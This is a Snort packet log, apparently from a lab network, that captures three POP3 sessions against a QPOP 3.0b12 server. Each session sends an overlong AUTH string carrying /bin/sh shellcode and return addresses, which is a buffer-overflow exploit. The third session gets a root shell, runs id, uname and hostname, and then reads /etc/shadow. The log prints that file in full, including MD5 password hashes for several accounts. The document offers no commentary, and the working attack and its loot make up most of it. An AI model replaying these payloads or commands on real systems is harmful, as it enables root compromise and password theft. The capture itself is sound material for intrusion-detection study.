snaplen = 65535 04/13-11:41:03.161379 192.168.118.11:1092 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:38522 IpLen:20 DgmLen:60 DF ******S* Seq: 0xCA2291DA Ack: 0x0 Win: 0x16D0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 250546080 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:03.161689 192.168.118.12:110 -> 192.168.118.11:1092 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0xEE19AA9B Ack: 0xCA2291DB Win: 0x16A0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 250534356 250546080 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:03.162824 192.168.118.11:1092 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:38523 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA2291DB Ack: 0xEE19AA9C Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250546081 250534356 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:03.185780 192.168.118.12:110 -> 192.168.118.11:1092 TCP TTL:64 TOS:0x0 ID:29513 IpLen:20 DgmLen:121 DF ***AP*** Seq: 0xEE19AA9C Ack: 0xCA2291DB Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250534359 250546081 +OK QPOP (version 3.0b12) at ppvm2-1.vmx.ie.cuhk.edu.hk starting . .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:03.186165 192.168.118.11:1092 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:38524 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA2291DB Ack: 0xEE19AAE1 Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250546083 250534359 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:03.186303 192.168.118.11:1092 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:38525 IpLen:20 DgmLen:1042 DF ***AP*** Seq: 0xCA2291DB Ack: 0xEE19AAE1 Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250546083 250534359 AUTH ........................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ....................................................^.......)... ......)............./bin/sh..................................... ..............P...P...P...P...P...P...P...P...P...P...P...P...P. ..P...P...P...P...P...P...P...P...P...P...P...P...P...P...P...P. ..P...P...P...P...P........... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:03.186362 192.168.118.12:110 -> 192.168.118.11:1092 TCP TTL:64 TOS:0x0 ID:29514 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xEE19AAE1 Ack: 0xCA2295B9 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250534359 250546083 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:03.192146 192.168.118.12:110 -> 192.168.118.11:1092 TCP TTL:64 TOS:0x0 ID:29515 IpLen:20 DgmLen:1076 DF ***AP*** Seq: 0xEE19AAE1 Ack: 0xCA2295B9 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250534360 250546083 -ERR Unknown authentication mechanism: ......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ......................^.......).........)............./bin/sh... ................................................P...P...P...P... P...P...P...P...P...P...P...P...P...P...P...P...P...P...P...P... P...P...P...P...P...P...P...P...P...P...P...P...P...P........... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:03.193832 192.168.118.12:110 -> 192.168.118.11:1092 TCP TTL:64 TOS:0x0 ID:29516 IpLen:20 DgmLen:52 DF ***A*R** Seq: 0xEE19AEE1 Ack: 0xCA2295B9 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250534360 250546083 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:08.249198 192.168.118.11:1094 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:3450 IpLen:20 DgmLen:60 DF ******S* Seq: 0xCA0B04E2 Ack: 0x0 Win: 0x16D0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 250546584 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:08.249343 192.168.118.12:110 -> 192.168.118.11:1094 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0xEDE99E35 Ack: 0xCA0B04E3 Win: 0x16A0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 250534865 250546584 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:08.249821 192.168.118.11:1094 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:3451 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA0B04E3 Ack: 0xEDE99E36 Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250546584 250534865 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:08.271880 192.168.118.12:110 -> 192.168.118.11:1094 TCP TTL:64 TOS:0x0 ID:17895 IpLen:20 DgmLen:121 DF ***AP*** Seq: 0xEDE99E36 Ack: 0xCA0B04E3 Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250534868 250546584 +OK QPOP (version 3.0b12) at ppvm2-1.vmx.ie.cuhk.edu.hk starting . .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:08.272382 192.168.118.11:1094 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:3452 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA0B04E3 Ack: 0xEDE99E7B Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250546585 250534868 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:08.273548 192.168.118.11:1094 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:3453 IpLen:20 DgmLen:1042 DF ***AP*** Seq: 0xCA0B04E3 Ack: 0xEDE99E7B Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250546585 250534868 AUTH ........................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ....................................................^.......)... ......)............./bin/sh..................................... ..............D...D...D...D...D...D...D...D...D...D...D...D...D. ..D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D. ..D...D...D...D...D........... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:08.284564 192.168.118.12:110 -> 192.168.118.11:1094 TCP TTL:64 TOS:0x0 ID:17896 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xEDE99E7B Ack: 0xCA0B08C1 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250534869 250546585 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:08.287781 192.168.118.12:110 -> 192.168.118.11:1094 TCP TTL:64 TOS:0x0 ID:17897 IpLen:20 DgmLen:1076 DF ***AP*** Seq: 0xEDE99E7B Ack: 0xCA0B08C1 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250534869 250546585 -ERR Unknown authentication mechanism: ......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ......................^.......).........)............./bin/sh... ................................................D...D...D...D... D...D...D...D...D...D...D...D...D...D...D...D...D...D...D...D... D...D...D...D...D...D...D...D...D...D...D...D...D...D........... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:08.290830 192.168.118.12:110 -> 192.168.118.11:1094 TCP TTL:64 TOS:0x0 ID:17898 IpLen:20 DgmLen:52 DF ***A*R** Seq: 0xEDE9A27B Ack: 0xCA0B08C1 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250534870 250546585 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:13.328328 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21474 IpLen:20 DgmLen:60 DF ******S* Seq: 0xCA7E5873 Ack: 0x0 Win: 0x16D0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 250547089 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:13.328425 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0xEEC15129 Ack: 0xCA7E5874 Win: 0x16A0 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 250535373 250547089 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:13.328799 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21475 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5874 Ack: 0xEEC1512A Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547089 250535373 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:13.350893 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36071 IpLen:20 DgmLen:121 DF ***AP*** Seq: 0xEEC1512A Ack: 0xCA7E5874 Win: 0x16A0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250535376 250547089 +OK QPOP (version 3.0b12) at ppvm2-1.vmx.ie.cuhk.edu.hk starting . .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:13.351233 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21476 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5874 Ack: 0xEEC1516F Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547090 250535376 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:13.351398 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21477 IpLen:20 DgmLen:1042 DF ***AP*** Seq: 0xCA7E5874 Ack: 0xEEC1516F Win: 0x16D0 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547090 250535376 AUTH ........................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ....................................................^.......)... ......)............./bin/sh..................................... ..............8...8...8...8...8...8...8...8...8...8...8...8...8. ..8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8. ..8...8...8...8...8........... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:13.351449 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36072 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xEEC1516F Ack: 0xCA7E5C52 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250535376 250547090 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:13.354862 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36073 IpLen:20 DgmLen:1076 DF ***AP*** Seq: 0xEEC1516F Ack: 0xCA7E5C52 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250535376 250547090 -ERR Unknown authentication mechanism: ......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ......................^.......).........)............./bin/sh... ................................................8...8...8...8... 8...8...8...8...8...8...8...8...8...8...8...8...8...8...8...8... 8...8...8...8...8...8...8...8...8...8...8...8...8...8........... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:13.393015 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21478 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5C52 Ack: 0xEEC1556F Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547095 250535376 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:18.351096 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21479 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xCA7E5C52 Ack: 0xEEC1556F Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547592 250535376 .id;. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:18.364077 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36074 IpLen:20 DgmLen:76 DF ***AP*** Seq: 0xEEC1556F Ack: 0xCA7E5C57 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250535877 250547592 uid=0(root) gid=0(root). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:18.364671 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21480 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5C57 Ack: 0xEEC15587 Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547593 250535877 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:18.364674 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21481 IpLen:20 DgmLen:72 DF ***AP*** Seq: 0xCA7E5C57 Ack: 0xEEC15587 Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547593 250535877 id; uname -a; cd /;. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:18.373345 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36075 IpLen:20 DgmLen:76 DF ***AP*** Seq: 0xEEC15587 Ack: 0xCA7E5C6B Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250535878 250547593 uid=0(root) gid=0(root). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:18.415841 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21482 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5C6B Ack: 0xEEC1559F Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547597 250535878 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:18.416040 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36076 IpLen:20 DgmLen:120 DF ***AP*** Seq: 0xEEC1559F Ack: 0xCA7E5C6B Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250535881 250547597 Linux ppvm2-1 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unkn own. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:18.416441 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21483 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5C6B Ack: 0xEEC155E3 Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547597 250535881 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:20.344520 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21484 IpLen:20 DgmLen:55 DF ***AP*** Seq: 0xCA7E5C6B Ack: 0xEEC155E3 Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547791 250535881 id. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:20.347723 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36077 IpLen:20 DgmLen:76 DF ***AP*** Seq: 0xEEC155E3 Ack: 0xCA7E5C6E Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250536075 250547791 uid=0(root) gid=0(root). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:20.350183 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21485 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5C6E Ack: 0xEEC155FB Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547792 250536075 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:22.109260 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21486 IpLen:20 DgmLen:61 DF ***AP*** Seq: 0xCA7E5C6E Ack: 0xEEC155FB Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547969 250536075 hostname. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:22.115960 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36078 IpLen:20 DgmLen:60 DF ***AP*** Seq: 0xEEC155FB Ack: 0xCA7E5C77 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250536252 250547969 ppvm2-1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:22.116883 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21487 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5C77 Ack: 0xEEC15603 Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250547970 250536252 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:26.817569 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21488 IpLen:20 DgmLen:68 DF ***AP*** Seq: 0xCA7E5C77 Ack: 0xEEC15603 Win: 0x1C00 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250548445 250536252 cat /etc/shadow. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:26.824218 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36079 IpLen:20 DgmLen:1075 DF ***AP*** Seq: 0xEEC15603 Ack: 0xCA7E5C87 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250536723 250548445 root:$1$bH7MR/Os$T0hgsrOJbSnaAF4ST.PDD.:12138:0:99999:7:::.bin:* :12138:0:99999:7:::.daemon:*:12138:0:99999:7:::.adm:*:12138:0:99 999:7:::.lp:*:12138:0:99999:7:::.sync:*:12138:0:99999:7:::.shutd own:*:12138:0:99999:7:::.halt:*:12138:0:99999:7:::.mail:*:12138: 0:99999:7:::.news:*:12138:0:99999:7:::.uucp:*:12138:0:99999:7::: .operator:*:12138:0:99999:7:::.games:*:12138:0:99999:7:::.gopher :*:12138:0:99999:7:::.ftp:*:12138:0:99999:7:::.nobody:*:12138:0: 99999:7:::.vcsa:!!:12138:0:99999:7:::.mailnull:!!:12138:0:99999: 7:::.rpm:!!:12138:0:99999:7:::.ntp:!!:12138:0:99999:7:::.rpc:!!: 12138:0:99999:7:::.xfs:!!:12138:0:99999:7:::.rpcuser:!!:12138:0: 99999:7:::.nfsnobody:!!:12138:0:99999:7:::.nscd:!!:12138:0:99999 :7:::.ident:!!:12138:0:99999:7:::.radvd:!!:12138:0:99999:7:::.ap ache:!!:12138:0:99999:7:::.squid:!!:12138:0:99999:7:::.named:!!: 12138:0:99999:7:::.pcap:!!:12138:0:99999:7:::.mysql:!!:12138:0:9 9999:7:::.test:$1$54dy3Ayl$m1DBGKL9JcqEAGeneVYp7/:12138:0:99999: 7:::.cto:$1$QJynA8EI$e/Qoc3MQ5XY2sHROd8EYU/:12515:0:99999:7:::. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:26.824938 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21489 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5C87 Ack: 0xEEC15A02 Win: 0x2400 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250548445 250536723 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:28.070538 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21490 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xCA7E5C87 Ack: 0xEEC15A02 Win: 0x2400 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250548569 250536723 quit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:28.072313 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36080 IpLen:20 DgmLen:85 DF ***AP*** Seq: 0xEEC15A02 Ack: 0xCA7E5C8C Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250536847 250548569 /bin/sh: quit: command not found. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:28.073004 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21491 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5C8C Ack: 0xEEC15A23 Win: 0x2400 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250548569 250536847 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:28.893442 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21492 IpLen:20 DgmLen:57 DF ***AP*** Seq: 0xCA7E5C8C Ack: 0xEEC15A23 Win: 0x2400 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250548649 250536847 exit. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:28.895634 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:64 TOS:0x0 ID:36081 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xEEC15A23 Ack: 0xCA7E5C91 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250536929 250548649 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:28.921467 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21493 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xCA7E5C91 Ack: 0xEEC15A24 Win: 0x2400 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250548654 250536929 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:29.622394 192.168.118.11:1096 -> 192.168.118.12:110 TCP TTL:64 TOS:0x0 ID:21494 IpLen:20 DgmLen:52 DF ***A***F Seq: 0xCA7E5C91 Ack: 0xEEC15A24 Win: 0x2400 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250548743 250536929 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 04/13-11:41:29.622818 192.168.118.12:110 -> 192.168.118.11:1096 TCP TTL:255 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xEEC15A24 Ack: 0xCA7E5C92 Win: 0x1B12 TcpLen: 32 TCP Options (3) => NOP NOP TS: 250537002 250548743 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =============================================================================== Snort processed 52 packets. Breakdown by protocol: Action Stats: TCP: 52 (100.000%) ALERTS: 0 UDP: 0 (0.000%) LOGGED: 0 ICMP: 0 (0.000%) PASSED: 0 ARP: 0 (0.000%) IPv6: 0 (0.000%) IPX: 0 (0.000%) OTHER: 0 (0.000%) =============================================================================== Fragmentation Stats: Fragmented IP Packets: 0 (0.000%) Rebuilt IP Packets: 0 Frag elements used: 0 Discarded(incomplete): 0 Discarded(timeout): 0 =============================================================================== TCP Stream Reassembly Stats: TCP Packets Used: 0 (0.000%) Reconstructed Packets: 0 (0.000%) Streams Reconstructed: 0 ===============================================================================